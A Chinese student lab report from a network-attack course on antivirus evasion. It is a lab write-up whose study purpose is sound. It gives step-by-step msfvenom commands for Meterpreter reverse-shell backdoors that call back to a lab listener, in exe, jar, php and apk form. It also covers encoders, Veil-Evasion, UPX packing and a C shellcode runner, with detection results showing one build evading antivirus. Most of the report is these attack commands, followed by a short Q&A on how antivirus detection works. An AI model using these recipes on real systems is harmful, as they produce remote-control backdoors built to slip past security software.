2019-2020-2 20175203马羽达《网络对抗技术》Exp3 免杀原理与实践

#2019-2020-2 20175203马羽达《网络对抗技术》Exp3 免杀原理与实践 ##1.1方法 ###1.1.1正确使用msf编码器 ###1.1.2msfvenom生成如jar之类的其他文件 ###1.1.3veil ###1.1.4加壳工具 ###1.1.5使用C + shellcode编程 ###1.1.6使用其他课堂未介绍方法 ##1.2通过组合应用各种技术实现恶意代码免杀 ##2.1基础问题回答 ###2.1.1杀软是如何检测出恶意代码的？ ###2.1.2免杀是做什么？ ###2.1.3免杀的基本方法有哪些？ ###2.1.4开启杀软能绝对防止电脑中恶意代码吗？ ##2.2.实践总结与体会 ##1.1方法 ###1.1.1正确使用msf编码器 在kali终端中，输入msfvenom查看该命令的参数详情，选用msfvenom -l encoders就能够查看编码器情况了。 将原来实验二中的后门程序发送至网站virustotal.com进行审查，如图所示 果然是一点隐蔽性都没有，轻松被看出来。 kali终端中输入cd /usr/share/metasploit-framework/modules/payloads/stagers/windows进入文件夹，ls查看Windows平台下的连接方式 之后，cd /usr/share/metasploit-framework/modules/encoders/x86进入文件夹，ls查看x86的编码方式 输入命令msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 52 -b '\x00' LHOST=192.168.113.131 LPORT=5203 -f exe > mydexptriBD.exe生成mydexptriBD.exe，检测如下： 就少了一个，没啥大用。。。看来杀软还是比较厉害的哈哈哈哈哈 ###1.1.2msfvenom生成如jar之类的其他文件 kali终端输入msfvenom -p java/meterpreter/reverse_tcp lhost=192.168.113.131 lport=5203 x> myd175203_backdoor_java.jar生成Java后门程序 导出后进行检测如下： 有了很大的改观，但是还是被一半的检测到 大同小异，输入msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.113.131 lport=5203 x> myd175203_backdoor.php生成php程序 导出后进行检测如下： 厉害了！！！就剩三个了，这里还是要吹一手卡巴斯基的！ 输入msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.113.131 lport=5203 x> myd175203_backdoor.apk生成apk文件（安装包，用于安卓） 导出后进行检测如下： 被三分之一的检测到了，但是手机上一般没有什么杀毒的习惯，所以还是要警惕这类的了 ###1.1.3veil 安装过程简直是。。。一言难尽，那么就先说一下吧，首先，安装第一遍没问题，然后输入veil会提示让你继续升级，这时候问题就来了，你需要有足够流畅的网络，之后下完一遍后，会发现它打不开，并提示你输入运行一条指令，在普通模式下输入后进入下载，有好多个错误是由于没有管理员权限所以无法实现，那么我们进入管理员模式进行相同操作，这时候，先更新架构dpkg --add-architecture i386 ,apt-get update,apt-get install wine32,然后安装veil-evasionapt-get install veil-evasion就大功告成了！希望对大家有帮助，之后就是打开veil 输入use evasion进入Veil-Evasion use c/meterpreter/rev_tcp.py进入配置界面 set LHOST 192.168.113.131设置反弹连接IP set LPORT 5203设置端口 输入generate生成后门程序文件，将程序命名为veilmyd 按照提示即可在系统文件夹找到相关程序，检测如下： 不太行啊小老弟。。。 ###1.1.4加壳工具 使用命令upx mydexptriBD.exe -o myd175203.upxed.exe加压缩壳 导出后进行检测如下： 没有更好的改观 ###1.1.5使用C + shellcode编程 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.113.131 LPORT=5203 -f c生成C语言下的shellcode数组 mkdir myd175203.c创建c文件

“shellcode数组”
int main()
{
    int (*func)() = (int(*)())buf;
    func();
}

输入i686-w64-mingw32-g++ myd175203.c -o myd1752203.exe交叉编译 导出后进行检测如下： 还是2/3，不算成功。。。 ###1.1.6使用其他课堂未介绍方法 在veil中输入use evasion进入Veil-Evasion use 29选择第29个， set USERNAME myd输入用户名，选择平台2，其他的都是kail相关的一些ip，端口等等如图： 生成文件名称默认，类型选择2，成为一个exe文件，发现是生成一个指令： 在主机中检测： 厉害了！！！ ##1.2通过组合应用各种技术实现恶意代码免杀 采用C语言调用bloxor编码的shellcode+加壳方式达成免杀目的 杀软：360 系统：win10 keil中msfvenom -p windows/meterpreter/reverse_tcp -e x86/bloxor LHOST=192.168.113.131 LPORT=5203 -f c生成shellcode数组，在主机c语言程序codeblocks中进行编译，在debug里找到exe程序，keil中upx 17523myd.exe -o myd_bloxor_upxed.exe加壳 一复制就被检测到了。。。gg 加壳后在主机里进行查杀，没找到！！！ 也不知道是该高兴还是不高兴，，， ##2.1基础问题回答 ###2.1.1杀软是如何检测出恶意代码的？ 杀软有自己的特征库，就是我们需要更新的病毒库，通过对其特征或者进程行为的比对进行检测。 ###2.1.2免杀是做什么？ 模糊恶意程序的特征行为，达到伪装，不被检测的目的。 ###2.1.3免杀的基本方法有哪些？ 生成如jar之类的其他文件，加壳，使用C + shellcode编程等等 ###2.1.4开启杀软能绝对防止电脑中恶意代码吗？ 当然不能，恶意软件进行更新，你在软件库里找不到同样类型的，就无法防范，但是开启杀毒软件还是能有效防范大部分恶意代码的。 ##2.2.实践总结与体会 本次实验让我更加深刻的了解了恶意代码的伪装过程，对keil的使用也有了近一步的熟练，收获还是很多的，尤其是在自主安装成功veil后，简直不要太快乐！（虽然好像不是一件很厉害的事情），由实验回归到现实，我把电脑360的病毒库设置为了wifi下自动更新，真的怕自己的电脑突然暴毙。。。